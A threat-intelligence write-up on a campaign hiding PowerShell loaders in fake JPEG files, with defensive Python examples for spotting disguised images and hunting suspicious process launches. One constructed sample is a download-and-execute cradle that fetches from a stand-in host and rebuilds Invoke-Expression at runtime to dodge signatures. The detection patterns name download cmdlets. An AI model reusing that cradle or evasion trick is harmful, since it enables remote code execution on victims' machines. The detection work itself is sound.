Cyfirma researchers identified a sophisticated cyberattack campaign targeting Windows systems using fake JPEG image files. The operation, named Operation SilentCanvas, tricks victims into running malicious PowerShell scripts disguised as harmless photos. Once the weaponized file runs, attackers gain full and silent control of the infected machine.
The attack begins when victims receive what appears to be a routine image file called sysupdate.jpeg. Despite carrying a JPEG extension, the file contains no image data whatsoever. Instead, it holds a PowerShell script engineered to quietly set up a staging environment and download further malicious components.
To avoid detection, the malware reconstructs dangerous command strings at runtime rather than storing them in plain text on disk. It also downloads a secondary payload named access.jpeg and runs it directly in memory. Furthermore, it uses Microsoft’s own .NET compiler, csc.exe, to build a custom launcher named uds.exe on the victim machine.
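One defensive check the file-masquerade technique above invites is comparing what an extension claims with what the bytes actually are. The Python below is an added example, not Cyfirma's tooling or code from the campaign; the indicator patterns and both sample files are constructed for this illustration, and the host placeholder.invalid is a placeholder, not a real indicator.

```python
"""Flag files whose extension claims an image but whose bytes are not one."""
import re
import string

# Real magic bytes for the image formats this check understands.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Indicators of an embedded PowerShell loader. This list is an assumption of
# the example, not a signature published by Cyfirma.
SCRIPT_INDICATORS = {
    "iex": re.compile(rb"Invoke-Expression|\bIEX\b", re.IGNORECASE),
    "download": re.compile(rb"DownloadString|DownloadFile|Invoke-WebRequest", re.IGNORECASE),
    "webclient": re.compile(rb"New-Object\s+(System\.)?Net\.WebClient", re.IGNORECASE),
    "string-rebuild": re.compile(rb"-join\b|\[char\]|-replace\b", re.IGNORECASE),
    "compiler": re.compile(rb"\bcsc\.exe\b", re.IGNORECASE),
}

PRINTABLE = set(string.printable.encode())


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII; genuine images score low."""
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def classify(filename: str, data: bytes) -> dict:
    """Compare the extension's claim with the bytes actually present."""
    dot = filename.rfind(".")
    ext = filename[dot:].lower() if dot != -1 else ""
    expected = IMAGE_MAGIC.get(ext)
    header_ok = expected is not None and any(data.startswith(m) for m in expected)
    hits = sorted(k for k, rx in SCRIPT_INDICATORS.items() if rx.search(data))

    if expected is None:
        verdict = "not-an-image-extension"
    elif header_ok and not hits:
        verdict = "ok"
    elif header_ok:
        verdict = "suspicious"   # valid image header, but script text inside
    else:
        verdict = "masquerade"   # claims to be an image, carries no image header
    return {
        "file": filename,
        "verdict": verdict,
        "header_ok": header_ok,
        "printable_ratio": round(printable_ratio(data), 2),
        "indicators": hits,
    }


# Constructed samples for the illustration, not the real campaign files.
# The fake rebuilds its cmdlet name at runtime, as the article describes,
# so a literal "Invoke-Expression" signature alone would miss it.
FAKE_JPEG = (
    b"$u='http://placeholder.invalid/access.jpeg'\r\n"
    b"$c=('Invoke-','Expr','ession') -join ''\r\n"
    b"$w=New-Object Net.WebClient\r\n"
    b"& $c $w.DownloadString($u)\r\n"
)
REAL_JPEG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + bytes(range(256))
)

if __name__ == "__main__":
    for name, blob in (("sysupdate.jpeg", FAKE_JPEG), ("photo.jpg", REAL_JPEG)):
        print(classify(name, blob))
```

The verdict rests on the header mismatch; the indicator list only explains why the content looks like a loader. Note that the sample's split-and-join trick defeats the literal `iex` pattern, and it is the `string-rebuild` indicator that still fires, which is the reason a detector for this campaign should not rely on cmdlet names alone.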
After the launcher runs, the malware hijacks a registry key tied to the ms-settings protocol. It also creates a hidden desktop environment that operates outside the logged-in user’s view, allowing tools to run undetected. Meanwhile, a persistent Windows service named OneDriveServers keeps the malware alive across reboots.
A separate component intercepts usernames and passwords at the Windows login screen, before authentication occurs. According to Cyfirma’s analysis, hidden local administrator accounts can also be created for long-term access. Security teams are advised to block or closely monitor execution of commonly abused Windows binaries, including csc.exe and ComputerDefaults.exe.
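The monitoring advice above can be turned into a few concrete process-creation rules that key on parent-child relationships rather than on the binary name alone, so that a developer's legitimate csc.exe run is not flagged while one spawned by a script host is. The Python below is an added example, not a published Cyfirma detection; the event format, rule names, the service-creation command line and file names such as launcher.cs are assumptions constructed for the illustration, while csc.exe, ComputerDefaults.exe, uds.exe, sysupdate.jpeg and OneDriveServers come from the article.

```python
"""Hunt constructed process-creation records for the pattern the article describes."""
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str        # timestamp of the process creation
    parent: str    # parent image name
    image: str     # child image name
    cmdline: str   # child command line


# Script hosts that should rarely be the parent of a compiler.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Service name the article attributes to the campaign.
SUSPECT_SERVICE = "onedriveservers"
# Image extensions; a script host referencing one on its command line is odd.
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")


def evaluate(ev: ProcEvent) -> list:
    """Return the names of every assumed rule this one event matches."""
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    rules = []
    # csc.exe is legitimate under Visual Studio or MSBuild; the signal is a
    # script host driving the compile, as the article says this malware does.
    if image == "csc.exe" and parent in SCRIPT_HOSTS:
        rules.append("compiler-spawned-by-script-host")
    # ComputerDefaults.exe launches the ms-settings: protocol handler, which is
    # the key the article says the malware hijacks.
    if image == "computerdefaults.exe":
        rules.append("ms-settings-handler-launched")
    # Service creation carrying the campaign's service name.
    if SUSPECT_SERVICE in cmd and ("create" in cmd or "new-service" in cmd):
        rules.append("persistence-service-created")
    # A script host whose command line points at an image-named file.
    if image in SCRIPT_HOSTS and any(ext in cmd for ext in IMAGE_EXTS):
        rules.append("script-host-touching-image-named-file")
    return rules


def hunt(events: list) -> list:
    """Run every event through the rules and keep only the ones that matched."""
    alerts = []
    for ev in events:
        matched = evaluate(ev)
        if matched:
            alerts.append({"ts": ev.ts, "image": ev.image, "rules": matched})
    return alerts


# Constructed sample telemetry; elided arguments are marked <elided>.
SAMPLE_EVENTS = [
    ProcEvent("09:59:58", "explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
    ProcEvent("10:00:01", "explorer.exe", "powershell.exe",
              'powershell.exe -NoProfile -Command "<elided> sysupdate.jpeg"'),
    ProcEvent("10:00:05", "powershell.exe", "csc.exe", "csc.exe /out:uds.exe launcher.cs"),
    ProcEvent("10:00:07", "uds.exe", "ComputerDefaults.exe", "ComputerDefaults.exe"),
    ProcEvent("10:00:09", "cmd.exe", "sc.exe", "sc create OneDriveServers binPath= <elided>"),
    # Benign: a developer build, same binary but a different parent.
    ProcEvent("10:30:00", "devenv.exe", "csc.exe", "csc.exe /noconfig project.rsp"),
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

On the sample data four of the six events alert and the developer's build does not, which is the tuning point the article's advice leaves open: outright blocking csc.exe breaks build hosts, so the parent-process condition is what makes the rule deployable outside a locked-down fleet.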
